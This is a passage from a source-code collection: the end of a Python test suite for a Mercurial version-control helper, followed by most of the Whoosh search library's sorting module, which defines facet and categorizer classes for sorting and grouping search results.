        m = get_mercurial_vcs_obj()
        m.vcs_config = {'repo': self.repodir, 'dest': self.wc, 'revision': self.revisions[-1]}
        rev = m.ensure_repo_and_revision()
        self.assertEquals(rev, self.revisions[-1])
        open(os.path.join(self.wc, 'test.txt'), 'w').write("hello!")
        m = get_mercurial_vcs_obj()
        m.vcs_config = {'repo': self.repodir, 'dest': self.wc, 'revision': self.revisions[0]}
        rev = m.ensure_repo_and_revision()
        self.assertEquals(rev, self.revisions[0])
        # Make sure our local file didn't go away
        self.failUnless(os.path.exists(os.path.join(self.wc, 'test.txt')))
    # TODO: this test doesn't seem to be compatible with mercurial()'s
    # share() usage, and fails when HG_SHARE_BASE_DIR is set
    def test_mercurial_change_repo(self):
        # Create a new repo
        old_env = os.environ.copy()
        if 'HG_SHARE_BASE_DIR' in os.environ:
            del os.environ['HG_SHARE_BASE_DIR']
        m = get_mercurial_vcs_obj()
        try:
            repo2 = os.path.join(self.tmpdir, 'repo2')
            self._init_hg_repo(m, repo2)
            self.assertNotEqual(self.revisions, get_revisions(repo2))
            # Clone the original repo
            m.vcs_config = {'repo': self.repodir, 'dest': self.wc}
            m.ensure_repo_and_revision()
            self.assertEquals(get_revisions(self.wc), self.revisions)
            open(os.path.join(self.wc, 'test.txt'), 'w').write("hello!")
            # Clone the new one
            m.vcs_config = {'repo': repo2, 'dest': self.wc}
            m.config = {'log_to_console': False}
            m.ensure_repo_and_revision()
            self.assertEquals(get_revisions(self.wc), get_revisions(repo2))
            # Make sure our local file went away
            self.failUnless(not os.path.exists(os.path.join(self.wc, 'test.txt')))
        finally:
            os.environ.clear()
            os.environ.update(old_env)
    def test_make_hg_url(self):
        #construct an hg url specific to revision, branch and filename and try to pull it down
        file_url = mercurial.make_hg_url(
            "hg.mozilla.org",
            '//build/tools/',
            revision='FIREFOX_3_6_12_RELEASE',
            filename="/lib/python/util/hg.py",
            protocol='https',
        )
        expected_url = "https://hg.mozilla.org/build/tools/raw-file/FIREFOX_3_6_12_RELEASE/lib/python/util/hg.py"
        self.assertEquals(file_url, expected_url)
    def test_make_hg_url_no_filename(self):
        file_url = mercurial.make_hg_url(
            "hg.mozilla.org",
            "/build/tools",
            revision="default",
            protocol='https',
        )
        expected_url = "https://hg.mozilla.org/build/tools/rev/default"
        self.assertEquals(file_url, expected_url)
    def test_make_hg_url_no_revision_no_filename(self):
        repo_url = mercurial.make_hg_url(
            "hg.mozilla.org",
            "/build/tools",
            protocol='https',
        )
        expected_url = "https://hg.mozilla.org/build/tools"
        self.assertEquals(repo_url, expected_url)
    def test_make_hg_url_different_protocol(self):
        repo_url = mercurial.make_hg_url(
            "hg.mozilla.org",
            "/build/tools",
            protocol='ssh',
        )
        expected_url = "ssh://hg.mozilla.org/build/tools"
        self.assertEquals(repo_url, expected_url)
    def test_share_repo(self):
        m = get_mercurial_vcs_obj()
        repo3 = os.path.join(self.tmpdir, 'repo3')
        m.share(self.repodir, repo3)
        # make sure shared history is identical
        self.assertEquals(self.revisions, get_revisions(repo3))
    def test_mercurial_share_outgoing(self):
        m = get_mercurial_vcs_obj()
        # ensure that outgoing changesets in a shared clone affect the shared history
        repo5 = os.path.join(self.tmpdir, 'repo5')
        repo6 = os.path.join(self.tmpdir, 'repo6')
        m.vcs_config = {'repo': self.repodir, 'dest': repo5}
        m.ensure_repo_and_revision()
        m.share(repo5, repo6)
        open(os.path.join(repo6, 'test.txt'), 'w').write("hello!")
        # modify the history of the new clone
        m.run_command(HG + ['add', 'test.txt'], cwd=repo6)
        m.run_command(HG + ['commit', '-m', 'adding changeset'], cwd=repo6)
        self.assertNotEquals(self.revisions, get_revisions(repo6))
        self.assertNotEquals(self.revisions, get_revisions(repo5))
        self.assertEquals(get_revisions(repo5), get_revisions(repo6))
    def test_apply_and_push(self):
        m = get_mercurial_vcs_obj()
        m.clone(self.repodir, self.wc)
        def c(repo, attempt):
            # Change callback: tag the repo so there is something to push.
            m.run_command(HG + ['tag', '-f', 'TEST'], cwd=repo)
        m.apply_and_push(self.wc, self.repodir, c)
        self.assertEquals(get_revisions(self.wc), get_revisions(self.repodir))
    def test_apply_and_push_fail(self):
        m = get_mercurial_vcs_obj()
        m.clone(self.repodir, self.wc)
        def c(repo, attempt, remote):
            # Create a conflicting tag on the remote on every attempt so the
            # push can never succeed.
            m.run_command(HG + ['tag', '-f', 'TEST'], cwd=repo)
            m.run_command(HG + ['tag', '-f', 'CONFLICTING_TAG'], cwd=remote)
        m.config = {'log_to_console': False}
        self.assertRaises(errors.VCSException, m.apply_and_push, self.wc,
                          self.repodir, lambda r, a: c(r, a, self.repodir),
                          max_attempts=2)
    def test_apply_and_push_with_rebase(self):
        m = get_mercurial_vcs_obj()
        m.clone(self.repodir, self.wc)
        m.config = {'log_to_console': False}
        def c(repo, attempt, remote):
            # Conflict only on the first attempt; the retry should rebase
            # and succeed.
            m.run_command(HG + ['tag', '-f', 'TEST'], cwd=repo)
            if attempt == 1:
                m.run_command(HG + ['rm', 'hello.txt'], cwd=remote)
                m.run_command(HG + ['commit', '-m', 'test'], cwd=remote)
        m.apply_and_push(self.wc, self.repodir,
                         lambda r, a: c(r, a, self.repodir), max_attempts=2)
        self.assertEquals(get_revisions(self.wc), get_revisions(self.repodir))
    def test_apply_and_push_rebase_fails(self):
        m = get_mercurial_vcs_obj()
        m.clone(self.repodir, self.wc)
        m.config = {'log_to_console': False}
        def c(repo, attempt, remote):
            # Conflict on the first two attempts; later attempts succeed.
            m.run_command(HG + ['tag', '-f', 'TEST'], cwd=repo)
            if attempt in (1, 2):
                m.run_command(HG + ['tag', '-f', 'CONFLICTING_TAG'], cwd=remote)
        m.apply_and_push(self.wc, self.repodir,
                         lambda r, a: c(r, a, self.repodir), max_attempts=4)
        self.assertEquals(get_revisions(self.wc), get_revisions(self.repodir))
    def test_apply_and_push_on_branch(self):
        m = get_mercurial_vcs_obj()
        if m.hg_ver() >= (1, 6, 0):
            m.clone(self.repodir, self.wc)
            def c(repo, attempt):
                m.run_command(HG + ['branch', 'branch3'], cwd=repo)
                m.run_command(HG + ['tag', '-f', 'TEST'], cwd=repo)
            m.apply_and_push(self.wc, self.repodir, c)
            self.assertEquals(get_revisions(self.wc), get_revisions(self.repodir))
    def test_apply_and_push_with_no_change(self):
        # A callback that changes nothing should raise: there is nothing
        # to push.
        m = get_mercurial_vcs_obj()
        m.clone(self.repodir, self.wc)
        def c(r, a):
            pass
        self.assertRaises(errors.VCSException, m.apply_and_push, self.wc, self.repodir, c)
if __name__ == '__main__':
    # Allow running this test module directly as a script.
    unittest.main()
| mpl-2.0 |
zorroz/microblog | flask/lib/python2.7/site-packages/whoosh/sorting.py | 19 | 41936 | # Copyright 2011 Matt Chaput. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY MATT CHAPUT ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL MATT CHAPUT OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are
# those of the authors and should not be interpreted as representing official
# policies, either expressed or implied, of Matt Chaput.
from array import array
from collections import defaultdict
from whoosh.compat import string_type
from whoosh.compat import iteritems, izip, xrange
# Faceting objects
class FacetType(object):
    """Base class for "facets" -- aspects of matched documents that results
    can be sorted and/or grouped by.
    """
    # Default facet-map type used by map(); may be overridden per instance.
    maptype = None
    def categorizer(self, global_searcher):
        """Return a :class:`Categorizer` corresponding to this facet.

        :param global_searcher: a parent searcher, usable when the
            categorizer needs global document ID references.
        """
        raise NotImplementedError
    def map(self, default=None):
        """Instantiate the facet map, preferring ``self.maptype``, then
        ``default``, then falling back to :class:`OrderedList`.
        """
        maptype = self.maptype
        if maptype is None:
            maptype = default
        if maptype is None:
            return OrderedList()
        if type(maptype) is type:
            # A class was supplied; instantiate it.
            return maptype()
        # Assume an already-constructed map object (or plain value).
        return maptype
    def default_name(self):
        return "facet"
class Categorizer(object):
    """Computes a key value per document for sorting/faceting.

    Instances are produced by :meth:`FacetType.categorizer`. Although the
    searcher handed to that method may wrap a multi-reader, categorizers
    are always driven one segment at a time with segment-relative document
    numbers; the collector calls ``set_searcher`` each time it moves to a
    new segment so the categorizer can set up segment-specific state.

    ``allow_overlap`` should be ``True`` if the caller may use ``keys_for``
    (instead of ``key_for``) to place a document into several, possibly
    overlapping, groups; the default is ``False``.

    ``needs_current`` should be ``True`` only if ``key_for``/``keys_for``
    actually inspect the matcher; this prevents the caller from applying
    optimizations that might leave the matcher inconsistent. When it is
    ``False`` (the default) implementations must NOT touch the matcher and
    must rely solely on the given segment docnum.
    """
    allow_overlap = False
    needs_current = False
    def set_searcher(self, segment_searcher, docoffset):
        """Prepare for a new segment. ``segment_searcher`` is atomic;
        ``docoffset`` is the offset of the segment's doc numbers within the
        whole index (add it to a segment-relative docnum to get an absolute
        one).
        """
        pass
    def key_for(self, matcher, segment_docnum):
        """Return the key for the current match.

        :param matcher: a :class:`whoosh.matching.Matcher`; must not be
            used unless ``self.needs_current`` is ``True``.
        :param segment_docnum: segment-relative docnum of the match.
        """
        # Dispatch to the legacy hook names if a subclass still defines them.
        by_id = getattr(self, "key_for_id", None)
        if by_id is not None:
            return by_id(segment_docnum)
        by_matcher = getattr(self, "key_for_matcher", None)
        if by_matcher is not None:
            return by_matcher(matcher)
        raise NotImplementedError(self.__class__)
    def keys_for(self, matcher, segment_docnum):
        """Yield a series of keys for the current match; called instead of
        ``key_for`` when ``self.allow_overlap`` is ``True``. The same
        matcher caveat as ``key_for`` applies.
        """
        # Backwards compatibility with the old hook name.
        legacy = getattr(self, "keys_for_id", None)
        if legacy is not None:
            return legacy(segment_docnum)
        raise NotImplementedError(self.__class__)
    def key_to_name(self, key):
        """Translate a raw sort key into a value meaningful for faceting
        output (e.g. date fields sort on a large integer which this method
        can turn back into a ``datetime``). The default is the identity.
        """
        return key
# General field facet
class FieldFacet(FacetType):
    """Sorts/facets by the contents of a single field.

    For example, to sort by "path" in reverse order while faceting by
    "tag"::

        paths = FieldFacet("path", reverse=True)
        tags = FieldFacet("tag")
        results = searcher.search(myquery, sortedby=paths, groupedby=tags)

    Which categorizer is returned depends on the field type.
    """
    def __init__(self, fieldname, reverse=False, allow_overlap=False,
                 maptype=None):
        """
        :param fieldname: the name of the field to sort/facet on.
        :param reverse: if True, when sorting, reverse the sort order of
            this facet.
        :param allow_overlap: if True, when grouping, allow documents to
            appear in multiple groups when they have multiple terms in the
            field.
        """
        self.fieldname = fieldname
        self.reverse = reverse
        self.allow_overlap = allow_overlap
        self.maptype = maptype
    def default_name(self):
        return self.fieldname
    def categorizer(self, global_searcher):
        # Although the searcher given here may wrap a multi-reader, the key
        # functions always run per-segment after a set_searcher() call.
        fieldname = self.fieldname
        fieldobj = global_searcher.schema[fieldname]
        # Overlapped grouping is only supported by OverlappingCategorizer.
        if self.allow_overlap:
            return OverlappingCategorizer(global_searcher, fieldname)
        if not global_searcher.reader().has_column(fieldname):
            # No column stored for this field: fall back to the (slow)
            # posting-based categorizer.
            return PostingCategorizer(global_searcher, fieldname,
                                      self.reverse)
        # Column-backed field: use the reversing wrapper only when the
        # column type cannot be reversed natively.
        if fieldobj.column_type.reversible or not self.reverse:
            return ColumnCategorizer(global_searcher, fieldname, self.reverse)
        return ReversedColumnCategorizer(global_searcher, fieldname)
class ColumnCategorizer(Categorizer):
    """Categorizer that reads sort keys straight from a field's column."""
    def __init__(self, global_searcher, fieldname, reverse=False):
        self._fieldname = fieldname
        self._fieldobj = global_searcher.schema[self._fieldname]
        self._column_type = self._fieldobj.column_type
        self._reverse = reverse
        # Per-segment column reader, installed by set_searcher() as the
        # collector walks the sub-searchers.
        self._creader = None
    def __repr__(self):
        return "%s(%r, %r, reverse=%r)" % (self.__class__.__name__,
                                           self._fieldobj, self._fieldname,
                                           self._reverse)
    def set_searcher(self, segment_searcher, docoffset):
        reader = segment_searcher.reader()
        self._creader = reader.column_reader(self._fieldname,
                                             reverse=self._reverse,
                                             translate=False)
    def key_for(self, matcher, segment_docnum):
        return self._creader.sort_key(segment_docnum)
    def key_to_name(self, key):
        # Translate the raw column value back into a user-facing value.
        return self._fieldobj.from_column_value(key)
class ReversedColumnCategorizer(ColumnCategorizer):
    """Categorizer that reverses column values for columns that aren't
    naturally reversible.
    """
    def __init__(self, global_searcher, fieldname):
        ColumnCategorizer.__init__(self, global_searcher, fieldname)
        reader = global_searcher.reader()
        self._doccount = reader.doc_count_all()
        # Build a sorted global ordering of the distinct column values so
        # each value can be mapped to a numeric rank.
        global_creader = reader.column_reader(fieldname, translate=False)
        self._values = sorted(set(global_creader))
    def key_for(self, matcher, segment_docnum):
        value = self._creader[segment_docnum]
        rank = self._values.index(value)
        # Negate the rank so ascending sorts come out reversed.
        return -rank
    def key_to_name(self, key):
        # Undo the negation to recover the index into _values.
        value = self._values[-key]
        return ColumnCategorizer.key_to_name(self, value)
class OverlappingCategorizer(Categorizer):
    """Categorizer used when a document may have multiple terms in the
    field and may therefore belong to several (overlapping) groups.
    """
    allow_overlap = True
    def __init__(self, global_searcher, fieldname):
        self._fieldname = fieldname
        self._fieldobj = global_searcher.schema[fieldname]
        field = global_searcher.schema[fieldname]
        reader = global_searcher.reader()
        # Prefer term vectors, then a list-capable column; otherwise fall
        # back to caching every document's term values in memory.
        self._use_vectors = bool(field.vector)
        self._use_column = (reader.has_column(fieldname)
                            and field.column_type.stores_lists())
        # Per-segment state, installed by set_searcher().
        self._segment_searcher = None
        self._creader = None
        self._lists = None
    def set_searcher(self, segment_searcher, docoffset):
        fieldname = self._fieldname
        self._segment_searcher = segment_searcher
        reader = segment_searcher.reader()
        if self._use_vectors:
            # Vectors are read lazily per document; nothing to prepare.
            pass
        elif self._use_column:
            self._creader = reader.column_reader(fieldname, translate=False)
        else:
            # Slow path: walk the field's sortable terms and record, for
            # every document in the segment, the list of its term values.
            doccount = segment_searcher.doc_count_all()
            field = segment_searcher.schema[fieldname]
            from_bytes = field.from_bytes
            self._lists = [[] for _ in xrange(doccount)]
            for btext in field.sortable_terms(reader, fieldname):
                text = from_bytes(btext)
                postings = reader.postings(fieldname, btext)
                for docid in postings.all_ids():
                    self._lists[docid].append(text)
    def keys_for(self, matcher, docid):
        if self._use_vectors:
            try:
                vector = self._segment_searcher.vector(docid,
                                                       self._fieldname)
                return list(vector.all_ids())
            except KeyError:
                # No vector stored for this document.
                return []
        if self._use_column:
            return self._creader[docid]
        return self._lists[docid] or [None]
    def key_for(self, matcher, docid):
        if self._use_vectors:
            try:
                vector = self._segment_searcher.vector(docid,
                                                       self._fieldname)
                return vector.id()
            except KeyError:
                return None
        if self._use_column:
            return self._creader.sort_key(docid)
        values = self._lists[docid]
        return values[0] if values else None
class PostingCategorizer(Categorizer):
    """
    Categorizer for fields that don't store column values. This is very
    inefficient. Instead of relying on this categorizer you should plan for
    which fields you'll want to sort on and set ``sortable=True`` in their
    field type.

    This object builds an array caching the order of all documents according to
    the field, then uses the cached order as a numeric key. This is useful when
    a field cache is not available, and also for reversed fields (since field
    cache keys for non- numeric fields are arbitrary data, it's not possible to
    "negate" them to reverse the sort order).
    """

    def __init__(self, global_searcher, fieldname, reverse):
        """
        :param global_searcher: top-level searcher; its ``_field_caches``
            dict is used to share the computed ordering between instances.
        :param fieldname: name of the (non-columnar) field to sort by.
        :param reverse: if True, invert the ordering in key_for()/key_to_name().
        """
        self.reverse = reverse

        if fieldname in global_searcher._field_caches:
            self.values, self.array = global_searcher._field_caches[fieldname]
        else:
            # Cache the relative positions of all docs with the given field
            # across the entire index
            reader = global_searcher.reader()
            dc = reader.doc_count_all()
            self._fieldobj = global_searcher.schema[fieldname]
            from_bytes = self._fieldobj.from_bytes

            self.values = []
            # dc + 1 is a sentinel greater than any real ordinal, so
            # documents without a value sort after all others
            self.array = array("i", [dc + 1] * dc)

            # sortable_terms yields terms in sorted order, so enumerate()
            # assigns each term its rank
            btexts = self._fieldobj.sortable_terms(reader, fieldname)
            for i, btext in enumerate(btexts):
                self.values.append(from_bytes(btext))
                # Get global docids from global reader
                postings = reader.postings(fieldname, btext)
                for docid in postings.all_ids():
                    self.array[docid] = i

            global_searcher._field_caches[fieldname] = (self.values, self.array)

    def set_searcher(self, segment_searcher, docoffset):
        self._searcher = segment_searcher
        # Offset to convert segment-relative docnums to global docnums
        self.docoffset = docoffset

    def key_for(self, matcher, segment_docnum):
        global_docnum = self.docoffset + segment_docnum
        i = self.array[global_docnum]
        if self.reverse:
            # Flip the ordinal so ascending key order yields descending values
            i = len(self.values) - i
        return i

    def key_to_name(self, i):
        """Convert a cached ordinal back into the field value it stands for."""
        if i >= len(self.values):
            # Sentinel ordinal: the document had no value for the field.
            # NOTE(review): with reverse=True the sentinel is flipped in
            # key_for() and is NOT caught by this check -- confirm callers
            # never hit that combination.
            return None
        if self.reverse:
            # Undo the reversal applied in key_for()
            i = len(self.values) - i
        return self.values[i]
# Special facet types
class QueryFacet(FacetType):
    """Sorts/facets based on the results of a series of queries.
    """

    def __init__(self, querydict, other=None, allow_overlap=False,
                 maptype=None):
        """
        :param querydict: a dictionary mapping keys to
            :class:`whoosh.query.Query` objects.
        :param other: the key to use for documents that don't match any of the
            queries.
        :param allow_overlap: if True, a document may be grouped under every
            query it matches rather than just one.
        :param maptype: a :class:`FacetMap` subclass controlling how grouped
            documents are recorded.
        """
        self.querydict = querydict
        self.other = other
        self.maptype = maptype
        self.allow_overlap = allow_overlap

    def categorizer(self, global_searcher):
        return self.QueryCategorizer(self.querydict, self.other, self.allow_overlap)

    class QueryCategorizer(Categorizer):
        def __init__(self, querydict, other, allow_overlap=False):
            self.querydict = querydict
            self.other = other
            self.allow_overlap = allow_overlap

        def set_searcher(self, segment_searcher, offset):
            # Pre-compute the set of matching docids for each query in this
            # segment; queries with no matches are omitted entirely
            self.docsets = {}
            for qname, q in self.querydict.items():
                docset = set(q.docs(segment_searcher))
                if docset:
                    self.docsets[qname] = docset
            self.offset = offset

        def key_for(self, matcher, docid):
            # Return the name of the first query whose docset contains the
            # document. NOTE(review): dict iteration order decides ties when
            # a document matches several queries.
            for qname in self.docsets:
                if docid in self.docsets[qname]:
                    return qname
            return self.other

        def keys_for(self, matcher, docid):
            """Generator of all matching query names; yields None when the
            document matches none of them.
            """
            found = False
            for qname in self.docsets:
                if docid in self.docsets[qname]:
                    yield qname
                    found = True
            if not found:
                yield None
class RangeFacet(QueryFacet):
    """Sorts/facets based on numeric ranges. For textual ranges, use
    :class:`QueryFacet`.

    For example, to facet the "price" field into $100 buckets, up to $1000::

        prices = RangeFacet("price", 0, 1000, 100)
        results = searcher.search(myquery, groupedby=prices)

    The ranges/buckets are always **inclusive** at the start and **exclusive**
    at the end.
    """

    def __init__(self, fieldname, start, end, gap, hardend=False,
                 maptype=None):
        """
        :param fieldname: the numeric field to sort/facet on.
        :param start: the start of the entire range.
        :param end: the end of the entire range.
        :param gap: the size of each "bucket" in the range. This can be a
            sequence of sizes. For example, ``gap=[1,5,10]`` will use 1 as the
            size of the first bucket, 5 as the size of the second bucket, and
            10 as the size of all subsequent buckets.
        :param hardend: if True, the end of the last bucket is clamped to the
            value of ``end``. If False (the default), the last bucket is always
            ``gap`` sized, even if that means the end of the last bucket is
            after ``end``.
        :param maptype: a :class:`FacetMap` subclass controlling how grouped
            documents are recorded.
        """
        self.fieldname = fieldname
        self.start = start
        self.end = end
        self.gap = gap
        self.hardend = hardend
        self.maptype = maptype
        # Precompute the bucket queries into self.querydict, which the
        # inherited QueryFacet machinery consumes
        self._queries()

    def default_name(self):
        return self.fieldname

    def _rangetype(self):
        # Deferred import to avoid a circular dependency with whoosh.query
        from whoosh import query

        return query.NumericRange

    def _range_name(self, startval, endval):
        """Return the key (group name) for the bucket [startval, endval)."""
        return (startval, endval)

    def _queries(self):
        """Populate self.querydict with one range query per bucket."""
        if not self.gap:
            # Fixed typo in the error message ("secified" -> "specified")
            raise Exception("No gap specified (%r)" % self.gap)
        if isinstance(self.gap, (list, tuple)):
            gaps = self.gap
            gapindex = 0
        else:
            gaps = [self.gap]
            # -1 means "always reuse the last gap size"
            gapindex = -1

        rangetype = self._rangetype()
        self.querydict = {}
        cstart = self.start
        while cstart < self.end:
            thisgap = gaps[gapindex]
            if gapindex >= 0:
                gapindex += 1
                # After consuming the explicit gap sizes, keep reusing the
                # last one for all remaining buckets
                if gapindex == len(gaps):
                    gapindex = -1

            cend = cstart + thisgap
            if self.hardend:
                cend = min(self.end, cend)

            rangename = self._range_name(cstart, cend)
            # endexcl=True: inclusive at the start, exclusive at the end
            q = rangetype(self.fieldname, cstart, cend, endexcl=True)
            self.querydict[rangename] = q

            cstart = cend

    def categorizer(self, global_searcher):
        # Delegate to a plain QueryFacet over the generated bucket queries
        return QueryFacet(self.querydict).categorizer(global_searcher)
class DateRangeFacet(RangeFacet):
    """Sorts/facets based on date ranges. This is the same as RangeFacet
    except you are expected to use ``daterange`` objects as the start and end
    of the range, and ``timedelta`` or ``relativedelta`` objects as the gap(s),
    and it generates :class:`~whoosh.query.DateRange` queries instead of
    :class:`~whoosh.query.TermRange` queries.

    For example, to facet a "birthday" range into 5 year buckets::

        from datetime import datetime
        from whoosh.support.relativedelta import relativedelta

        startdate = datetime(1920, 1, 1)
        enddate = datetime.now()
        gap = relativedelta(years=5)
        bdays = DateRangeFacet("birthday", startdate, enddate, gap)
        results = searcher.search(myquery, groupedby=bdays)

    The ranges/buckets are always **inclusive** at the start and **exclusive**
    at the end.
    """

    def _rangetype(self):
        # Deferred import to avoid a circular dependency with whoosh.query
        from whoosh import query

        return query.DateRange
class ScoreFacet(FacetType):
    """Uses a document's relevance score as a sorting criterion.

    For example, to sort by the ``tag`` field, and then within that by
    relative score::

        tag_score = MultiFacet(["tag", ScoreFacet()])
        results = searcher.search(myquery, sortedby=tag_score)
    """

    def categorizer(self, global_searcher):
        return self.ScoreCategorizer(global_searcher)

    class ScoreCategorizer(Categorizer):
        # Scores can only be read from the live matcher, so the sorting
        # machinery must keep the matcher positioned on the document
        needs_current = True

        def __init__(self, global_searcher):
            weighting = global_searcher.weighting
            self.use_final = weighting.use_final
            if weighting.use_final:
                # Bind the final() adjustment hook only when the weighting
                # model defines one
                self.final = weighting.final

        def set_searcher(self, segment_searcher, offset):
            self.segment_searcher = segment_searcher

        def key_for(self, matcher, docid):
            raw = matcher.score()
            adjusted = (self.final(self.segment_searcher, docid, raw)
                        if self.use_final else raw)
            # Negate the score so higher-scoring documents sort first
            return 0 - adjusted
class FunctionFacet(FacetType):
    """This facet type is low-level. In most cases you should use
    :class:`TranslateFacet` instead.

    This facet type lets you pass an arbitrary function that will compute the
    key. This may be easier than subclassing FacetType and Categorizer to set up
    the desired behavior.

    The function is called with the arguments ``(searcher, docid)``, where the
    ``searcher`` may be a composite searcher, and the ``docid`` is an absolute
    index document number (not segment-relative).

    For example, to use the number of words in the document's "content" field
    as the sorting/faceting key::

        fn = lambda s, docid: s.doc_field_length(docid, "content")
        lengths = FunctionFacet(fn)
    """

    def __init__(self, fn, maptype=None):
        """
        :param fn: a callable taking ``(searcher, docid)`` and returning the
            sort/facet key for that document.
        :param maptype: a :class:`FacetMap` subclass controlling how grouped
            documents are recorded.
        """
        self.fn = fn
        self.maptype = maptype

    def categorizer(self, global_searcher):
        return self.FunctionCategorizer(global_searcher, self.fn)

    class FunctionCategorizer(Categorizer):
        def __init__(self, global_searcher, fn):
            self.global_searcher = global_searcher
            self.fn = fn

        def set_searcher(self, segment_searcher, docoffset):
            # Only the offset is needed: the user function receives the
            # *global* searcher and a global document number
            self.offset = docoffset

        def key_for(self, matcher, docid):
            # Convert the segment-relative docid to a global docnum
            return self.fn(self.global_searcher, docid + self.offset)
class TranslateFacet(FacetType):
    """Lets you specify a function to compute the key based on a key generated
    by a wrapped facet.

    This is useful if you want to use a custom ordering of a sortable field. For
    example, if you want to use an implementation of the Unicode Collation
    Algorithm (UCA) to sort a field using the rules from a particular language::

        from pyuca import Collator

        # The Collator object has a sort_key() method which takes a unicode
        # string and returns a sort key
        c = Collator("allkeys.txt")

        # Make a facet object for the field you want to sort on
        facet = sorting.FieldFacet("name")

        # Wrap the facet in a TranslateFacet with the translation function
        # (the Collator object's sort_key method)
        facet = sorting.TranslateFacet(c.sort_key, facet)

        # Use the facet to sort the search results
        results = searcher.search(myquery, sortedby=facet)

    You can pass multiple facets to the constructor; the key computed by each
    one is passed to the function as a separate argument.
    """

    def __init__(self, fn, *facets):
        """
        :param fn: The function to apply. For each matching document, this
            function will be called with the values of the given facets as
            arguments.
        :param facets: One or more :class:`FacetType` objects. These facets are
            used to compute facet value(s) for a matching document, and then the
            value(s) is/are passed to the function.
        """
        self.fn = fn
        self.facets = facets
        self.maptype = None

    def categorizer(self, global_searcher):
        # One sub-categorizer per wrapped facet, in the same order the
        # facets were given (their keys become the fn arguments)
        catters = [facet.categorizer(global_searcher) for facet in self.facets]
        return self.TranslateCategorizer(self.fn, catters)

    class TranslateCategorizer(Categorizer):
        def __init__(self, fn, catters):
            self.fn = fn
            self.catters = catters

        def set_searcher(self, segment_searcher, docoffset):
            # Forward the segment change to every wrapped categorizer
            for catter in self.catters:
                catter.set_searcher(segment_searcher, docoffset)

        def key_for(self, matcher, segment_docnum):
            keys = [catter.key_for(matcher, segment_docnum)
                    for catter in self.catters]
            return self.fn(*keys)
class StoredFieldFacet(FacetType):
    """Lets you sort/group using the value in an unindexed, stored field (e.g.
    :class:`whoosh.fields.STORED`). This is usually slower than using an indexed
    field.

    For fields where the stored value is a space-separated list of keywords,
    (e.g. ``"tag1 tag2 tag3"``), you can use the ``allow_overlap`` keyword
    argument to allow overlapped faceting on the result of calling the
    ``split()`` method on the field value (or calling a custom split function
    if one is supplied).
    """

    def __init__(self, fieldname, allow_overlap=False, split_fn=None,
                 maptype=None):
        """
        :param fieldname: the name of the stored field.
        :param allow_overlap: if True, when grouping, allow documents to appear
            in multiple groups when they have multiple terms in the field. The
            categorizer uses ``string.split()`` or the custom ``split_fn`` to
            convert the stored value into a list of facet values.
        :param split_fn: a custom function to split a stored field value into
            multiple facet values when ``allow_overlap`` is True. If not
            supplied, the categorizer simply calls the value's ``split()``
            method.
        :param maptype: a :class:`FacetMap` subclass controlling how grouped
            documents are recorded.
        """
        self.fieldname = fieldname
        self.allow_overlap = allow_overlap
        self.split_fn = split_fn
        self.maptype = maptype

    def default_name(self):
        return self.fieldname

    def categorizer(self, global_searcher):
        return self.StoredFieldCategorizer(self.fieldname, self.allow_overlap,
                                           self.split_fn)

    class StoredFieldCategorizer(Categorizer):
        def __init__(self, fieldname, allow_overlap, split_fn):
            self.fieldname = fieldname
            self.allow_overlap = allow_overlap
            self.split_fn = split_fn

        def set_searcher(self, segment_searcher, docoffset):
            self.segment_searcher = segment_searcher

        def keys_for(self, matcher, docid):
            d = self.segment_searcher.stored_fields(docid)
            value = d.get(self.fieldname)
            # NOTE(review): value.split() will raise AttributeError when the
            # document has no stored value (value is None) -- confirm callers
            # guarantee the field is present
            if self.split_fn:
                return self.split_fn(value)
            else:
                return value.split()

        def key_for(self, matcher, docid):
            d = self.segment_searcher.stored_fields(docid)
            return d.get(self.fieldname)
class MultiFacet(FacetType):
    """Sorts/facets by the combination of multiple "sub-facets".

    For example, to sort by the value of the "tag" field, and then (for
    documents where the tag is the same) by the value of the "path" field::

        facet = MultiFacet([FieldFacet("tag"), FieldFacet("path")])
        results = searcher.search(myquery, sortedby=facet)

    As a shortcut, you can use strings to refer to field names, and they will
    be assumed to be field names and turned into FieldFacet objects::

        facet = MultiFacet(["tag", "path"])

    You can also use the ``add_*`` methods to add criteria to the multifacet::

        facet = MultiFacet()
        facet.add_field("tag")
        facet.add_field("path", reverse=True)
        facet.add_query({"a-m": TermRange("name", "a", "m"),
                         "n-z": TermRange("name", "n", "z")})
    """

    def __init__(self, items=None, maptype=None):
        """
        :param items: an optional sequence of :class:`FacetType` objects
            and/or field name strings.
        :param maptype: a :class:`FacetMap` subclass controlling how grouped
            documents are recorded.
        """
        self.facets = []
        if items:
            for item in items:
                self._add(item)
        self.maptype = maptype

    def __repr__(self):
        return "%s(%r, %r)" % (self.__class__.__name__,
                               self.facets,
                               self.maptype)

    @classmethod
    def from_sortedby(cls, sortedby):
        """Build a MultiFacet from the many forms accepted by the
        ``sortedby`` search keyword (string, iterable, or single facet).
        """
        multi = cls()
        # Check for a string FIRST: strings are iterable, so the iterable
        # branch below would otherwise split them into characters
        if isinstance(sortedby, string_type):
            multi._add(sortedby)
        elif (isinstance(sortedby, (list, tuple))
              or hasattr(sortedby, "__iter__")):
            for item in sortedby:
                multi._add(item)
        else:
            multi._add(sortedby)
        return multi

    def _add(self, item):
